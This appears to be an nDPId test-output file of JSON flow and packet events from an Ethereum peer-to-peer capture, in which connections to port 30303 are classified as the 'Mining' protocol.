00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1578508365951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1578508365951,"pkt":"KDc3AG3IEBMx8Tl2CABFAACvrTpAADMRthqnVnoywKgBuHZfdl8AmyGXAff4avCCJKd8iLkYnGp5WBGcR5kwKjaGYfuGK7O5Pxha3PZrVargsE3sp+V969kCE0ZShXRyP212X0\/ogX+KLxU0BMrg9yur0MCSn4OC+hF8e78p1SovnEhcJv1j5UvsAALwyYSnVnoygnZfgKByZEv+wn4eYEUXuf5R8Qoku8N0GB0rNIQImrGkxu4BYoReFiBh"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366020,"flow_last_seen":1578508366020,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366020,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1578508366020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366020,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGwhnAqAG4WGNd291tdl+CSdQcAAAAALAC\/\/9XrgAAAgQFtAEDAwUBAQgKItiZpAAAAAAEAgAA"}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366020,"flow_last_seen":1578508366020,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366020,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1578508366020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366020,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGwhnAqAG4WGNd291tdl+CSdQcAAAAALAC\/\/9XrgAAAgQFtAEDAwUBAQgKItiZpAAAAAAEAgAA"}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"}
